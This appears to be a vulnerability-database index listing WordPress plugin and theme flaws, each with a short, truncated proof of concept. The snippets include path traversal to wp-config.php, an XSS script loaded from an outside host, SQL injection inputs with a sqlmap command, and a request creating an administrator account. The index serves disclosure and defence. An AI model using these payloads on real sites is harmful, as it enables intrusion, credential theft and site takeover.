Admin Pack by SITE CASEIRO <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)
The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability...
Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. http://localhost:8080/?pageid=0&&errorsfu-disallowed-mime-type0name=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E...
Wordpress CodeArt Google MP3 Player - File Disclosure
The google-mp3-audio-player WordPress plugin was affected by a File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/google-mp3-audio-player/directdownload.php?file=../../../wp-config.php...
Dailydeal by Templatic - CSRF File Upload
The dailydeal WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/dailydeal/images/tmp/yourshell.php...
Nightlife by Templatic - CSRF File Upload
The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/nightlife/images/tmp/yourshell.php...
Prostore < 1.1.3 - Open Redirection
The prostore WordPress theme was affected by an Open Redirection security vulnerability. /wp-content/themes/prostore/go.php?https://example.com...
Support Ticket System By Phoeniixx <= 2.7 - Unauthenticated Reflected XSS
Bad user input sanitisation leads to unauthenticated reflected XSS. Edit WPScanTeam: January 27th, 2020 - Report received & WP Plugin team notified. January 31st, 2020 - WP plugin team acknowledgement & plugin closed. April 11th, 2020 - No updates, disclosing...
Superlist <= 2.9.2 - Stored Cross-Site Scripting (XSS)
Persistent XSS was discovered in the 'Superlist - Directory WordPress Theme'; the version tested was v2.9.2. Edit WPScanTeam: December 2nd, 2019 - Envato contacted. December 2nd, 2019 - Envato investigating. December 12th, 2019 - No updates, disclosing. The PoC will be displayed once the issue has...
Qwiz Online Quizzes And Flashcards <= 3.36 - Unauthenticated Reflected Cross Site Scripting
The qname, iqwiz, sessionid and username parameters passed to the registrationcomplete.php file are affected by XSS issues. The plugin has been closed while the issue is being fixed. /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registrationcomplete.php?&qname=alert"XSS"...
Gallery Photoblocks < 1.1.41 - Unauthenticated Reflected XSS
Also Full Path Disclosure, depending on the configuration of the server: https:///wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id="...
Newsletter Manager < 1.5 - Unauthenticated Open Redirect
The plugin used base64-encoded user input in the appurl parameter without validation to redirect users via the PHP header() function, leading to an open redirect issue. In the file '/newsletter-manager/confirmation.php': 33: $xyzemurl = base64_decode($_GET['appurl']); ... 179:...
Social Media & Share Icons <= 2.1.7 - Multiple Issues
The Social Media Share Buttons & Social Sharing Icons WordPress plugin was affected by a Multiple Issues security vulnerability. https://plugins.trac.wordpress.org/browser/ultimate-social-media-icons/tags/2.1.7/libs/controllers/sfsi_buttons_controller.php#L877...
Better WordPress reCAPTCHA <= 2.0.3 - Unauthenticated Cross-Site Scripting (XSS)
There is a reflected XSS vulnerability in Better WordPress reCAPTCHA plugin version 2.0.3, and possibly below. The value of the cerror parameter is reflected in the page when this plugin is enabled. Once the plugin is disabled, the "cerror" parameter's value is no longer reflected in the page. This is the HT...
Ultimate Product Catalogue <= 4.2.2 - Authenticated SQL Injection
User access type: subscriber upwards. $_POST['CatID'] is not escaped. File / Code: Path: /wp-content/plugins/ultimate-product-catalogue/Functions/ProcessAjax.php...
Woo Custom Checkout Field <= 1.3.4 - CSRF & Stored XSS
Due to a lack of CSRF mitigation and entity encoding in the ccfinsert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php, it is possible to store and execute scripts in the context of an admin user...
Simple Photo Gallery 1.7.8 - Blind SQL Injection
MySQL >= 5.0.12 AND time-based blind SELECT SQL injection in the galleryid parameter. ./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppgphotogallery/wppgphotodetails/?galleryid=1&imageid=14...
Premium SEO Pack 1.8.0 - Unauthenticated Arbitrary File Upload & LFD
This plugin is vulnerable to Local File Disclosure and Remote Code Execution via Arbitrary File Upload. BASE64 ENCODED SHELL...
QAEngine Theme - Privilege Escalation
QAEngine vulnerability allows an attacker to have an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...
Aspose Cloud eBook Generator - File Download
The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/aspose-cloud-ebook-generator/asposepostsexporterdownload.php?file=../../../wp-config.php...
Quasar Theme Rock Form Builder plugin - Privilege Escalation
The Rock Form Builder plugin 1.0 is used within the Quasar WooCommerce theme 1.9.1. Authenticated users can modify WordPress settings which can lead to full site compromise. It's unclear which exact version of the rock-form-builder fixed the issue, but it was something in between 1.0 and 2.5, so...
SEO Redirection < 2.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The plugin did not sanitise the referer link from requests before displaying it in the 'Settings > SEO Redirection > Redirection History' page. This results in a Stored Cross-Site Scripting (XSS) issue. This cURL request to a redirected page with a custom referer makes it possible: curl -H 'Referer:...
NativeChurch Theme - Arbitrary File Download
The NativeChurch WordPress theme was affected by an Arbitrary File Download security vulnerability. https://example.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php...
wp-FileManager <= 1.3.0 - File Download
The wp-filemanager WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download...
WooCommerce Conversion Tracking < 2.0.5 - CSRF to XSS
The settings page of the plugin is lacking CSRF checks as well as input sanitisation, leading to stored XSS. ' /...
WP Custom Body Class <= 0.7.0 - CSRF to Stored XSS and Settings Update
Lack of CSRF check and sanitisation when updating the plugin's settings could lead to unauthorised settings update as well as stored XSS issues. XSS fixed in 0.7.0. CSRF still there - vendor contacted. CSRF fixed in 0.7.1. /wp-admin/options-general.php?page=custombodyclass" method="POST" ' /...
Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Blog Designer WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability. Send a POST request to: /wp-admin/admin-ajax.php?action=save&updated=true With request body: customcss=confirm1...
Custom Permalinks <= 1.1 - Authenticated SQL Injection
Missing checking of user controllable input during Bulk Action in the Custom Permalinks backend page leads to SQL injection vulnerability. Send authenticated POST request to "URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks" with parameters "action=delete&permalinks=1 PAYLOAD -- "...
WordPress Task Manager Pro <= 1.3.1 - Authenticated SQL Injection
Blind SQL Injection on task-details page task parameter. Logged as a follower: https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep1+and+1%3D1...
Email Before Download < 4.0 - SMTP Header Injection
Email Before Download https://wordpress.org/plugins/email-before-download/ before version 4.0 was vulnerable to an SMTP header injection which allows abuse of the vulnerable website to send spam or phishing emails. In email-before-download.php, the "emailFrom" variable comes directly from the...
AffiliateWP <= 2.0.9 - Authenticated Cross-Site Scripting (XSS)
The AffiliateWP WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability. http://vulnerablesite.com//wp-admin/admin.php?page=affiliate-wp-referrals&filterfrom=%27%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E...
Row Seats Core <= 2.66 - Unauthenticated PHP Object Injection
The plugin row-seats insecurely trusts serialized data submitted over HTTP requests. This opens the site up to a potential PHP object injection exploit vector. This vulnerability was patched in version 2.68; the information is being released now as the disclosure period has expired. Attac...
Answer My Question 1.3 - Cross-Site Scripting (XSS)
The answer-my-question WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability. Host: 10.194.0.44 URL: http://10.194.0.44/wp-content/plugins/answer-my-question/modal.php Parameter: Hidden Field id Payload: "alert1...
AccessPress Social Icons < 1.6.8 - Authenticated SQL Injections
During the security analysis, ThunderScan discovered SQL injection vulnerabilities in AccessPress Social Icons WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plug...
XCloner - Backup and Restore < 3.1.5 - Authenticated Path Traversal
Authenticated users are able to perform directory listings at any location available to the WordPress user, leaking filenames of previous backups. This was found in XCloner - Backup and Restore version 3.1.4, but may have been introduced in earlier versions. Attackers can leverage directory...
Product Catalog 8 1.2 - Unauthenticated SQL Injection
$_POST['selectedCategory'] is not escaped. UpdateCategoryList is accessible to any user...
Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download
The function "mdocsimgpreview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus allowing arbitrary files on the file system to be downloaded. The vulnerable GET parameter is "mdocs-img-preview". The...
ABtest - File Inclusion
The abtest WordPress plugin was affected by a File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/abtest/abtestadmin.php?action=../../../../../../../../../../../../../../../proc/self/environ%00...
Advanced uploader - Local File Inclusion
The Advanced uploader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00...
Music Store <= 1.0.14 - Referer Header Open Redirect
The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:...
WordPress prettyPhoto <= 1.1 - DOM Cross-Site Scripting (XSS)
The WordPress prettyPhoto plugin was affected by a DOM Cross-Site Scripting (XSS) security vulnerability. http://www.example.com/prettyPhotogallery/1,/...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in the "SingleProduct" parameter when a web visitor views a product published by the web administrator. This exploit requires magic_quotes_gpc to be turned off on the destination server. File Functions/Shortcodes.php line 779 http:///?SingleProduct=2'+and+'a'='a...
WordPress Video Gallery <= 2.8 - SQL Injection
Note: The vendor patched the issue but did not change the version number. Using fixed in version 2.8.1 for detection reasons although in reality this version does not exist at the time of writing. http://www.example.com/wp-admin/admin-ajax.php?action=googleadsense&vid=SQLi...
Duplicator <= 0.5.14 - SQL Injection & CSRF
An authorised user with "export" permission, or a remote unauthenticated attacker enticing an authenticated admin (CSRF), could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site. http://www.example.com/wp-admin/admin-ajax.php?action=duplicatorpackagedelete PO...
Feedweb 2.4.1-3.0.6 - SQL Injection
The feedweb WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/feedweb/widgetcontainer.php?pid= Inject here &ishp=true...
GI-Media Library <= 2.2.2 - Arbitrary File Download
The gi-media-library WordPress plugin was affected by an Arbitrary File Download security vulnerability. /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64-encoded...
Plugin HD Webplayer <= 1.1 - SQL Injections
The last time it was checked the plugin was still affected and had been closed. http://example.com/wp-content/plugins/hd-webplayer/config.php?id=INJECT HERE http://example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=INJECT HERE...
WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion
The plugin did not have a CSRF nonce check on the "wpfcdeletecurrentpagecache" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file. document.form.submit;...
WP Accessibility < 1.7.0 - Minor Authenticated Stored XSS in custom CSS
A minor authenticated stored XSS vulnerability was found in the "Styles for Skiplinks when they have focus" section of the WP Accessibility plugin. 1) Navigate to the Settings page of the plugin https://example.com/wp-admin/options-general.php?page=wp-accessibility/wp-accessibility.php 2) Select th...
Safe SVG < 1.9.6 - XSS Protection Bypass
By using entities in the payload, XSS succeeds in bypassing the protection of the Safe SVG plugin. Video PoC for v1.9.5: https://www.youtube.com/watch?v=hnQA2hc-4k...
User Registration <= 1.5.5 - Authenticated Cross-Site Scripting (XSS)
The User Registration – Custom Registration Form, Login And User Profile For WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability...